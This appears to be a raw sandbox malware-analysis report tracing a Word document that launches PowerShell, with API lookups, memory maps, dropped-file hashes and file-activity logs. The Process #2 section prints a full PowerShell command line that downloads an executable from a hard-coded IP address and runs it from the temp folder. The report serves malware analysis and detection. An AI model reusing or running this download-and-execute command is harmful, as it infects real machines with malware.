Get Address Unknown module name function = SafeArrayCopyData, address_out = 0x7ff9db4226b0 True 1
Fn
Get Address Unknown module name function = SafeArrayAllocDescriptorEx, address_out = 0x7ff9db422c30 True 1
Fn
Get Address Unknown module name function = SafeArrayCreateEx, address_out = 0x7ff9db481870 True 1
Fn
Get Address Unknown module name function = VarFormat, address_out = 0x7ff9db486540 True 1
Fn
Get Address Unknown module name function = VarFormatDateTime, address_out = 0x7ff9db486750 True 1
Fn
Get Address Unknown module name function = VarFormatNumber, address_out = 0x7ff9db4867d0 True 1
Fn
Get Address Unknown module name function = VarFormatPercent, address_out = 0x7ff9db4868e0 True 1
Fn
Get Address Unknown module name function = VarFormatCurrency, address_out = 0x7ff9db486630 True 1
Fn
Get Address Unknown module name function = VarWeekdayName, address_out = 0x7ff9db486d20 True 1
Fn
Get Address Unknown module name function = VarMonthName, address_out = 0x7ff9db4869d0 True 1
Fn
Get Address Unknown module name function = VarAdd, address_out = 0x7ff9db472760 True 1
Fn
Get Address Unknown module name function = VarAnd, address_out = 0x7ff9db475000 True 1
Fn
Get Address Unknown module name function = VarCat, address_out = 0x7ff9db473150 True 1
Fn
Get Address Unknown module name function = VarDiv, address_out = 0x7ff9db4732a0 True 1
Fn
Get Address Unknown module name function = VarEqv, address_out = 0x7ff9db475190 True 1
Fn
Get Address Unknown module name function = VarIdiv, address_out = 0x7ff9db4751c0 True 1
Fn
Get Address Unknown module name function = VarImp, address_out = 0x7ff9db475380 True 1
Fn
Get Address Unknown module name function = VarMod, address_out = 0x7ff9db475470 True 1
Fn
Get Address Unknown module name function = VarMul, address_out = 0x7ff9db473930 True 1
Fn
Get Address Unknown module name function = VarOr, address_out = 0x7ff9db475690 True 1
Fn
Get Address Unknown module name function = VarPow, address_out = 0x7ff9db474220 True 1
Fn
Get Address Unknown module name function = VarSub, address_out = 0x7ff9db474450 True 1
Fn
Get Address Unknown module name function = VarXor, address_out = 0x7ff9db475830 True 1
Fn
Get Address Unknown module name function = VarAbs, address_out = 0x7ff9db471950 True 1
Fn
Get Address Unknown module name function = VarFix, address_out = 0x7ff9db471c40 True 1
Fn
Get Address Unknown module name function = VarInt, address_out = 0x7ff9db471e40 True 1
Fn
Get Address Unknown module name function = VarNeg, address_out = 0x7ff9db472020 True 1
Fn
Get Address Unknown module name function = VarNot, address_out = 0x7ff9db4755f0 True 1
Fn
Get Address Unknown module name function = VarRound, address_out = 0x7ff9db4723b0 True 1
Fn
Get Address Unknown module name function = VarCmp, address_out = 0x7ff9db436710 True 1
Fn
Get Address Unknown module name function = VarDecAdd, address_out = 0x7ff9db4764d0 True 1
Fn
Get Address Unknown module name function = VarDecCmp, address_out = 0x7ff9db421390 True 1
Fn
Get Address Unknown module name function = VarBstrCat, address_out = 0x7ff9db4374a0 True 1
Fn
Get Address Unknown module name function = VarCyMulI4, address_out = 0x7ff9db421560 True 1
Fn
Get Address Unknown module name function = VarBstrCmp, address_out = 0x7ff9db436bd0 True 1
Fn
Get Address Unknown module name function = CoCreateInstanceEx, address_out = 0x7ff9dd846770 True 1
Fn
Get Address Unknown module name function = CLSIDFromProgIDEx, address_out = 0x7ff9dd834b70 True 1
Fn
Get Address Unknown module name function = MsoMultiByteToWideChar, address_out = 0x7ff9b015f200 True 1
Fn
Get Address Unknown module name function = 713, address_out = 0x7ff9b075a1f4 True 1
Fn
Get Address Unknown module name function = 528, address_out = 0x7ff9b052273c True 1
Fn
Get Address Unknown module name function = 526, address_out = 0x7ff9b0524974 True 1
Fn
Get Address Unknown module name function = 522, address_out = 0x7ff9b0522694 True 1
Fn
Get Address Unknown module name function = 712, address_out = 0x7ff9b075a03c True 1
Fn
Get Address Unknown module name function = 617, address_out = 0x7ff9b0522490 True 1
Fn
Get Address Unknown module name function = 717, address_out = 0x7ff9b073b034 True 1
Fn
Get Address Unknown module name function = 619, address_out = 0x7ff9b0522540 True 1
Fn
Get Address Unknown module name function = 524, address_out = 0x7ff9b05226e8 True 1
Fn
Get Address Unknown module name function = 632, address_out = 0x7ff9b051fe60 True 1
Fn
Get Address Unknown module name function = 608, address_out = 0x7ff9b052142c True 1
Fn
Get Address Unknown module name function = 711, address_out = 0x7ff9b0759eb0 True 1
Fn
Get Address Unknown module name function = 600, address_out = 0x7ff9b04dc6fc True 1
Fn
Window (1)
»
Operation Window Name Additional Information Success Count Logfile
Create - class_name = ThunderMain, wndproc_parameter = 0 True 1
Fn
System (19)
»
Operation Additional Information Success Count Logfile
Get Cursor x_out = 134, y_out = 125 True 2
Fn
Get Cursor x_out = 471, y_out = 287 True 1
Fn
Get Time type = Local Time, time = 2018-04-20 20:20:35 (Local Time) True 13
Fn
Get Info type = Operating System True 2
Fn
Get Info type = Operating System True 1
Fn
Environment (1)
»
Operation Additional Information Success Count Logfile
Get Environment String name = DDRYBUR False 1
Fn
Process #2: powershell.exe
1181 20
»
Information Value
ID #2
File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line powershell.exe -w 1 (New-Object System.Net.WebClient).DownloadFile('http://185.189.58.222/x.exe',([System.IO.Path]::GetTempPath()+'\PHfW.exe'));powershell.exe -w 1 Start-Process -Filepath ([System.IO.Path]::GetTempPath()+'\PHfW.exe');
Initial Working Directory C:\Users\FD1HVy\Documents\
Monitor Start Time: 00:00:37, Reason: Child Process
Unmonitor End Time: 00:05:46, Reason: Terminated by Timeout
Monitor Duration 00:05:09
OS Process Information
»
Information Value
PID 0x11a0
Parent PID 0x1230 (c:\program files\microsoft office\root\office16\winword.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username NQDPDE\FD1HVy
Enabled Privileges SeChangeNotifyPrivilege, SeCreateGlobalPrivilege
Thread IDs
0x DA8
0x 138C
0x 1394
0x 135C
0x 10A4
0x 10B8
0x 10D0
0x 1118
0x 1124
0x 10F8
0x 10F4
0x C24
0x C04
0x 11F8
0x 12A8
0x 1044
0x 1188
0x FE0
0x AA8
0x AB4
0x 1050
0x 1064
0x 12F0
0x 1124
0x 1100
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffe0fff Private Memory Readable True False False -
private_0x000000007ffe1000 0x7ffe1000 0x7ffeffff Private Memory Readable True False False -
private_0x0000004808ae0000 0x4808ae0000 0x4808b5ffff Private Memory Readable, Writable True False False -
private_0x0000004808b60000 0x4808b60000 0x4808bdffff Private Memory Readable, Writable True False False -
private_0x0000004808c00000 0x4808c00000 0x4808dfffff Private Memory Readable, Writable True False False -
private_0x0000004808e00000 0x4808e00000 0x4808e7ffff Private Memory Readable, Writable True False False -
private_0x0000004808e80000 0x4808e80000 0x4808efffff Private Memory Readable, Writable True False False -
private_0x0000004808f00000 0x4808f00000 0x4808f7ffff Private Memory Readable, Writable True False False -
private_0x0000004808f80000 0x4808f80000 0x4808ffffff Private Memory Readable, Writable True False False -
private_0x0000004809000000 0x4809000000 0x480907ffff Private Memory Readable, Writable True False False -
private_0x0000004809080000 0x4809080000 0x48090fffff Private Memory Readable, Writable True False False -
private_0x0000004809100000 0x4809100000 0x480913ffff Private Memory Readable, Writable True False False -
private_0x0000004809140000 0x4809140000 0x48091bffff Private Memory Readable, Writable True False False -
private_0x00000048091c0000 0x48091c0000 0x480923ffff Private Memory Readable, Writable True False False -
private_0x0000004809240000 0x4809240000 0x48092bffff Private Memory Readable, Writable True False False -
private_0x00000048092c0000 0x48092c0000 0x480933ffff Private Memory Readable, Writable True False False -
private_0x0000004809340000 0x4809340000 0x480937ffff Private Memory Readable, Writable True False False -
private_0x0000004809380000 0x4809380000 0x48093fffff Private Memory Readable, Writable True False False -
private_0x0000004809400000 0x4809400000 0x480947ffff Private Memory Readable, Writable True False False -
private_0x0000024700000000 0x24700000000 0x24717ffffff Private Memory Readable, Writable True False False -
private_0x000002477afd0000 0x2477afd0000 0x2477afeffff Private Memory Readable, Writable True False False -
pagefile_0x000002477afd0000 0x2477afd0000 0x2477afdffff Pagefile Backed Memory Readable, Writable True False False -
private_0x000002477afe0000 0x2477afe0000 0x2477afe6fff Private Memory Readable, Writable True False False -
pagefile_0x000002477aff0000 0x2477aff0000 0x2477b007fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002477b010000 0x2477b010000 0x2477b013fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002477b020000 0x2477b020000 0x2477b020fff Pagefile Backed Memory Readable True False False -
private_0x000002477b030000 0x2477b030000 0x2477b030fff Private Memory Readable, Writable True False False -
locale.nls 0x2477b040000 0x2477b104fff Memory Mapped File Readable False False False -
private_0x000002477b110000 0x2477b110000 0x2477b11ffff Private Memory Readable, Writable True False False -
private_0x000002477b120000 0x2477b120000 0x2477b126fff Private Memory Readable, Writable True False False -
private_0x000002477b130000 0x2477b130000 0x2477b22ffff Private Memory Readable, Writable True False False -
pagefile_0x000002477b230000 0x2477b230000 0x2477b437fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002477b440000 0x2477b440000 0x2477b5c0fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002477b5d0000 0x2477b5d0000 0x2477c9cffff Pagefile Backed Memory Readable True False False -
pagefile_0x000002477c9d0000 0x2477c9d0000 0x2477c9d1fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002477c9e0000 0x2477c9e0000 0x2477c9e0fff Pagefile Backed Memory Readable, Writable True False False -
powershell.exe.mui 0x2477c9f0000 0x2477c9f2fff Memory Mapped File Readable False False False -
private_0x000002477ca00000 0x2477ca00000 0x2477ca00fff Private Memory Readable, Writable True False False -
private_0x000002477ca10000 0x2477ca10000 0x2477ca10fff Private Memory Readable, Writable True False False -
private_0x000002477ca20000 0x2477ca20000 0x2477ca26fff Private Memory Readable, Writable True False False -
pagefile_0x000002477ca30000 0x2477ca30000 0x2477ca30fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000002477ca40000 0x2477ca40000 0x2477ca4ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x000002477ca50000 0x2477ca50000 0x2477ca5ffff Private Memory Readable, Writable True False False -
private_0x000002477ca60000 0x2477ca60000 0x2477ca60fff Private Memory Readable, Writable True False False -
private_0x000002477ca70000 0x2477ca70000 0x2477ca70fff Private Memory Readable, Writable True False False -
private_0x000002477ca80000 0x2477ca80000 0x2477ca8ffff Private Memory Readable, Writable True False False -
private_0x000002477ca90000 0x2477ca90000 0x2477cafffff Private Memory Readable, Writable True False False -
private_0x000002477cb00000 0x2477cb00000 0x2477cb0ffff Private Memory Readable, Writable True False False -
private_0x000002477cb10000 0x2477cb10000 0x2477cb1ffff Private Memory Readable, Writable True False False -
pagefile_0x000002477cb20000 0x2477cb20000 0x2477cb20fff Pagefile Backed Memory Readable True False False -
winnlsres.dll 0x2477cb30000 0x2477cb34fff Memory Mapped File Readable False False False -
winnlsres.dll.mui 0x2477cb40000 0x2477cb4ffff Memory Mapped File Readable False False False -
pagefile_0x000002477cb50000 0x2477cb50000 0x2477cb50fff Pagefile Backed Memory Readable, Writable True False False -
private_0x000002477cb60000 0x2477cb60000 0x2477cb6ffff Private Memory Readable, Writable, Executable True False False -
pagefile_0x000002477cb70000 0x2477cb70000 0x2477cbabfff Pagefile Backed Memory Readable, Writable True False False -
microsoft.powershell.utility.psm1 0x2477cbb0000 0x2477cbb7fff Memory Mapped File Readable False False False -
pagefile_0x000002477cbb0000 0x2477cbb0000 0x2477cbb0fff Pagefile Backed Memory Readable True False False -
r00000000000d.clb 0x2477cbc0000 0x2477cbc5fff Memory Mapped File Readable False False False -
private_0x000002477cbd0000 0x2477cbd0000 0x2477cbdffff Private Memory - True False False -
tzres.dll 0x2477cbe0000 0x2477cbe0fff Memory Mapped File Readable, Writable False False False -
tzres.dll.mui 0x2477cbe0000 0x2477cbeafff Memory Mapped File Readable False False False -
private_0x000002477cbe0000 0x2477cbe0000 0x2477cbeffff Private Memory Readable, Writable True False False -
private_0x000002477cc10000 0x2477cc10000 0x2477cc1ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x2477cc20000 0x2477cf56fff Memory Mapped File Readable False False False -
private_0x000002477cf60000 0x2477cf60000 0x2477d069fff Private Memory Readable, Writable True False False -
mscorrc.dll 0x2477d070000 0x2477d0d1fff Memory Mapped File Readable True False False -
private_0x000002477d130000 0x2477d130000 0x2477d13ffff Private Memory Readable, Writable, Executable True False False -
rpcss.dll 0x2477d140000 0x2477d248fff Memory Mapped File Readable False False False -
private_0x000002477d140000 0x2477d140000 0x2477d23ffff Private Memory Readable, Writable True False False -
pagefile_0x000002477d240000 0x2477d240000 0x2477d63ffff Pagefile Backed Memory Readable True False False -
microsoft-windows-client-features-wow64-package-automerged-onecore~31bf3856ad364e35~amd64~~10.0.15063.0.cat 0x2477d640000 0x2477d715fff Memory Mapped File Readable False False False -
pagefile_0x00007df5ff640000 0x7df5ff640000 0x7ff5ff63ffff Pagefile Backed Memory - True False False -
private_0x00007ff687810000 0x7ff687810000 0x7ff68781ffff Private Memory Readable, Writable, Executable True False False -
private_0x00007ff687820000 0x7ff687820000 0x7ff6878bffff Private Memory Readable, Writable, Executable True False False -
pagefile_0x00007ff6878c0000 0x7ff6878c0000 0x7ff6879bffff Pagefile Backed Memory Readable True False False -
pagefile_0x00007ff6879c0000 0x7ff6879c0000 0x7ff6879e2fff Pagefile Backed Memory Readable True False False -
powershell.exe 0x7ff687ae0000 0x7ff687b4ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ff94fe60000 0x7ff94fe60000 0x7ff94fe6ffff Private Memory - True False False -
private_0x00007ff94fe70000 0x7ff94fe70000 0x7ff94fe7ffff Private Memory - True False False -
private_0x00007ff94fe80000 0x7ff94fe80000 0x7ff94ff0ffff Private Memory - True False False -
private_0x00007ff94ff10000 0x7ff94ff10000 0x7ff94ff7ffff Private Memory - True False False -
private_0x00007ff94ff80000 0x7ff94ff80000 0x7ff94ffbffff Private Memory - True False False -
private_0x00007ff94ffc0000 0x7ff94ffc0000 0x7ff94ffcffff Private Memory - True False False -
private_0x00007ff94ffd0000 0x7ff94ffd0000 0x7ff94ffdffff Private Memory - True False False -
private_0x00007ff94ffe0000 0x7ff94ffe0000 0x7ff94ffeffff Private Memory - True False False -
private_0x00007ff94fff0000 0x7ff94fff0000 0x7ff94fffffff Private Memory - True False False -
private_0x00007ff950000000 0x7ff950000000 0x7ff95000ffff Private Memory - True False False -
private_0x00007ff950010000 0x7ff950010000 0x7ff95001ffff Private Memory - True False False -
system.transactions.dll 0x7ff9a8980000 0x7ff9a89cefff Memory Mapped File Readable, Writable, Executable True False False -
system.transactions.ni.dll 0x7ff9a89d0000 0x7ff9a8aa5fff Memory Mapped File Readable, Writable, Executable True False False -
system.numerics.ni.dll 0x7ff9a8ab0000 0x7ff9a8afefff Memory Mapped File Readable, Writable, Executable True False False -
system.xml.ni.dll 0x7ff9a8ba0000 0x7ff9a9436fff Memory Mapped File Readable, Writable, Executable True False False -
system.directoryservices.ni.dll 0x7ff9a9440000 0x7ff9a959efff Memory Mapped File Readable, Writable, Executable True False False -
system.management.ni.dll 0x7ff9a95a0000 0x7ff9a96fffff Memory Mapped File Readable, Writable, Executable True False False -
system.management.automation.ni.dll 0x7ff9aa690000 0x7ff9ac694fff Memory Mapped File Readable, Writable, Executable True False False -
microsoft.powershell.consolehost.ni.dll 0x7ff9ac6a0000 0x7ff9ac745fff Memory Mapped File Readable, Writable, Executable True False False -
system.core.ni.dll 0x7ff9ac750000 0x7ff9ad10efff Memory Mapped File Readable, Writable, Executable True False False -
system.ni.dll 0x7ff9ad110000 0x7ff9add31fff Memory Mapped File Readable, Writable, Executable True False False -
mscorlib.ni.dll 0x7ff9adf10000 0x7ff9af48dfff Memory Mapped File Readable, Writable, Executable True False False -
msvcr120_clr0400.dll 0x7ff9af490000 0x7ff9af586fff Memory Mapped File Readable, Writable, Executable False False False -
clr.dll 0x7ff9af590000 0x7ff9aff6dfff Memory Mapped File Readable, Writable, Executable True False False -
microsoft.management.infrastructure.ni.dll 0x7ff9b0be0000 0x7ff9b0c7afff Memory Mapped File Readable, Writable, Executable True False False -
atl.dll 0x7ff9b1d50000 0x7ff9b1d6bfff Memory Mapped File Readable, Writable, Executable False False False -
microsoft.powershell.security.ni.dll 0x7ff9b21f0000 0x7ff9b224efff Memory Mapped File Readable, Writable, Executable True False False -
clrjit.dll 0x7ff9b2250000 0x7ff9b2363fff Memory Mapped File Readable, Writable, Executable True False False -
system.configuration.ni.dll 0x7ff9b2370000 0x7ff9b2491fff Memory Mapped File Readable, Writable, Executable True False False -
system.data.dll 0x7ff9b24a0000 0x7ff9b27f4fff Memory Mapped File Readable, Writable, Executable True False False -
system.data.ni.dll 0x7ff9b2800000 0x7ff9b30fcfff Memory Mapped File Readable, Writable, Executable True False False -
mpoav.dll 0x7ff9b3510000 0x7ff9b352ffff Memory Mapped File Readable, Writable, Executable False False False -
amsi.dll 0x7ff9b3530000 0x7ff9b353ffff Memory Mapped File Readable, Writable, Executable False False False -
mscoreei.dll 0x7ff9b35a0000 0x7ff9b363cfff Memory Mapped File Readable, Writable, Executable True False False -
mscoree.dll 0x7ff9bec50000 0x7ff9becb2fff Memory Mapped File Readable, Writable, Executable True False False -
version.dll 0x7ff9ce320000 0x7ff9ce329fff Memory Mapped File Readable, Writable, Executable False False False -
gpapi.dll 0x7ff9d9010000 0x7ff9d9031fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x7ff9d9750000 0x7ff9d9783fff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x7ff9d9cd0000 0x7ff9d9ce6fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x7ff9d9cf0000 0x7ff9d9cfafff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x7ff9da050000 0x7ff9da074fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x7ff9da220000 0x7ff9da234fff Memory Mapped File Readable, Writable, Executable False False False -
kernel.appcore.dll 0x7ff9da240000 0x7ff9da250fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x7ff9da260000 0x7ff9da270fff Memory Mapped File Readable, Writable, Executable False False False -
powrprof.dll 0x7ff9da280000 0x7ff9da2cbfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x7ff9da2d0000 0x7ff9da518fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32full.dll 0x7ff9da520000 0x7ff9da6a7fff Memory Mapped File Readable, Writable, Executable False False False -
windows.storage.dll 0x7ff9da6b0000 0x7ff9dada2fff Memory Mapped File Readable, Writable, Executable False False False -
wintrust.dll 0x7ff9dadb0000 0x7ff9dae05fff Memory Mapped File Readable, Writable, Executable False False False -
win32u.dll 0x7ff9dae10000 0x7ff9dae2dfff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x7ff9daee0000 0x7ff9db0a8fff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x7ff9db0b0000 0x7ff9db0f8fff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x7ff9db100000 0x7ff9db169fff Memory Mapped File Readable, Writable, Executable False False False -
ucrtbase.dll 0x7ff9db170000 0x7ff9db265fff Memory Mapped File Readable, Writable, Executable False False False -
msvcp_win.dll 0x7ff9db270000 0x7ff9db309fff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x7ff9db310000 0x7ff9db317fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x7ff9db380000 0x7ff9db41dfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x7ff9db420000 0x7ff9db4dffff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x7ff9db4e0000 0x7ff9dc916fff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x7ff9dcf20000 0x7ff9dcf70fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x7ff9dcf80000 0x7ff9dcfd8fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x7ff9dd0f0000 0x7ff9dd11cfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x7ff9dd120000 0x7ff9dd146fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x7ff9dd150000 0x7ff9dd294fff Memory Mapped File Readable, Writable, Executable False False False -
shcore.dll 0x7ff9dd2a0000 0x7ff9dd349fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x7ff9dd4e0000 0x7ff9dd604fff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x7ff9dd610000 0x7ff9dd6b0fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x7ff9dd6c0000 0x7ff9dd76dfff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x7ff9dd770000 0x7ff9dda68fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7ff9dda70000 0x7ff9ddb0cfff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x7ff9ddb10000 0x7ff9ddb7bfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x7ff9ddc60000 0x7ff9ddda9fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x7ff9dddb0000 0x7ff9ddf8afff Memory Mapped File Readable, Writable, Executable False False False -
For performance reasons, the remaining 59 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\fd1hvy\appdata\local\temp\__psscriptpolicytest_pcfxszbc.ddv.ps1 0.00 KB MD5: c4ca4238a0b923820dcc509a6f75849b
SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
False
c:\users\fd1hvy\appdata\local\temp\__psscriptpolicytest_gbsbmxho.bhs.psm1 0.00 KB MD5: c4ca4238a0b923820dcc509a6f75849b
SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
False
c:\users\fd1hvy\appdata\local\temp\phfw.exe 255.01 KB MD5: 368a8f05fa7be1fcc24f445c444acb30
SHA1: 909bee1d1a19f2ea43ba38e826d49c0e7cf958b3
SHA256: 846ad2d7e1e133ae4bc2decbc22ae686a44cccaffbee15b4d9b23143f6aa8d3f
False
Host Behavior
File (406)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_pcfxszbc.ddv.ps1 desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_gbsbmxho.bhs.psm1 desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 2
Fn
Create C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 2
Fn
Create C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create Pipe \device\namedpipe\pshost.131687220369232747.4512.defaultappdomain.powershell open_mode = PIPE_ACCESS_INBOUND, PIPE_ACCESS_OUTBOUND, FILE_FLAG_FIRST_PIPE_INSTANCE, FILE_FLAG_OVERLAPPED, pipe_mode = PIPE_READMODE_MESSAGE, PIPE_TYPE_MESSAGE, max_instances = 1 True 1
Fn
Get Info C:\WINDOWS\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 type = file_type True 2
Fn
Get Info C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe.config type = file_attributes False 3
Fn
Get Info C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe type = file_attributes True 2
Fn
Get Info C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell type = file_attributes True 1
Fn
Get Info STD_OUTPUT_HANDLE type = file_type True 1
Fn
Get Info STD_INPUT_HANDLE type = file_type True 1
Fn
Get Info - type = file_type True 1
Fn
Get Info C:\Users\FD1HVy type = file_attributes True 5
Fn
Get Info C:\ type = file_attributes True 2
Fn
Get Info C:\Users\FD1HVy\Documents type = file_attributes True 8
Fn
Get Info C:\Users type = file_attributes True 4
Fn
Get Info C:\WINDOWS\system32\wldp.dll type = file_attributes True 5
Fn
Get Info C:\Users\FD1HVy\AppData\Local\Temp\ type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_pcfxszbc.ddv.ps1 type = file_type True 2
Fn
Get Info C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_gbsbmxho.bhs.psm1 type = file_type True 2
Fn
Get Info C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_pcfxszbc.ddv.ps1 type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_gbsbmxho.bhs.psm1 type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Users\FD1HVy\Documents\WindowsPowerShell\profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Users\FD1HVy\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 type = file_attributes False 1
Fn
Get Info C:\ProgramData\Oracle\Java\javapath type = file_attributes True 2
Fn
Get Info C:\WINDOWS\system32 type = file_attributes True 2
Fn
Get Info C:\WINDOWS type = file_attributes True 2
Fn
Get Info C:\WINDOWS\System32\Wbem type = file_attributes True 2
Fn
Get Info C:\WINDOWS\System32\WindowsPowerShell\v1.0\ type = file_attributes True 2
Fn
Get Info C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps type = file_attributes True 1
Fn
Get Info C:\Program Files\Microsoft Office\root\Client type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Documents\WindowsPowerShell\Modules type = file_attributes False 2
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules type = file_attributes True 2
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Modules.psd1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Modules.psm1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Modules.cdxml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Modules.xaml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Modules.ni.dll type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Modules.dll type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation type = file_attributes True 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PackageManagement type = file_attributes True 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester type = file_attributes True 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet type = file_attributes True 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline type = file_attributes True 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Microsoft.PowerShell.Operation.Validation.psd1 type = file_attributes True 3
Fn
Get Info C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache type = file_attributes True 1
Fn
